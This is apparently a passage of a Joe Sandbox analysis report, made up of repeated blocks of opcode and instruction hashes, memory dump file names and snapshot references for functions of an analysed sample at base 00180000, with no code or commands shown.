                                        • Opcode Fuzzy Hash: fa8f18ab107bc81f47f28cc1c1be182337819a77b99bd50b2dce41a4c4f6f8ac
                                        • Instruction Fuzzy Hash: 04512CF3A082085BE7147E3AED4877BBBDADBD5760F1B813DD68087788F93598058285
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: 9975fb23b5b1939449f9ebb362232cc29595fb5f96c3964b5f49a7c71ff83dd1
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 1F82D1B5A00F448FD765CF29C880B92B7F1BF5A300F548A2ED9EA9B651DB30B545CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 96bb34b778b67ef686e0cba5ff666694630d66cbac964356d5b1688936c8e66f
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 6842C1706047518FC729CF19C098B75FBE2BFA9310F298AAED4868B791D735E885CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: d9cff39bfd90527e9697580924213ca7cad5b6ad30e0b9d2f40fc5b7e1a2a662
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: 680206B1E0431A8FCB15CF68C8906BFB7E2AF9A344F56831AE919B7241D774AD4187D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 36758208736f437ec41dbe54f43d24a5b36d74f6c12d3904f2f96ea7c3aea85e
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: FD02F071A087058FDB19DF29C880369B7E2AFA5350F15C72EE8999B392D731E885CB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 22f0d6f413f9527d74016ec84b429158b5d522ef79ae030816a913c5ff6c4b49
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 7FF17AA220C6914BC71D9A1484F09BD7FD25FAA201F0E86ADFDD70F393DA24DA01DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 79c725220b6974bdd1a2f78f2342fc3ee339dfe35f2d7b24e97064bc97f4c373
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 4ED1B773F20A254BEB18CE99DC913ADB6E2EBD8350F19413ED916F7381D6B89D018790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction ID: 9e0861f5d3ddc3c2dd04b3867c8ba8fde3caeabd5a6c4602f1569163d3a6d579
                                        • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction Fuzzy Hash: 89D1E272E0061D8BDF29CF98C8947FEB7B2BF49310F158229EA15A7292D73459468B90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 3a9d6a0feba878b17d0fe5540e834579458b08e829cbea8f0bfdf54f2346c5d0
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 2D027974E046588FCF26CFA8C4905EDBBB6FF8D310F55815AE88A6B355C730AA91CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: ae12cb252971a5bc3f127653a8ee50de2f6e9edf9b86850cfc5c564c4c7aedc6
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 27021475E00619CFCF15CF98C4809ADB7B6FF88350F25856AE80AAB355D731AA91CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 523d9f93e8dd0d142435837c9f92e251e59d0fbc727c9a447fd54ca442006aa8
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: 4EC18EB6E29B854BD713873DC802275F395AFE7290F45D72EFDE472942FB20A6818204
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 26403a74dea32ab99947f2cdc3ce63fae8a0b2758b1c95b01324d9c06c18aa55
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: CCD13570600B80CFD725CF2AC494B6BB7E0BB59300F54892ED89A8BB92D735F845CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction ID: 77c628c091ea7b809c1b73eade8832b32ac7a04ffa7c968f4c427b2207ee991c
                                        • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction Fuzzy Hash: ECD13AB010C3808FD7149F15D0A472BBFE0AF95709F19899EE4D90F391C7BA9949DB92
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
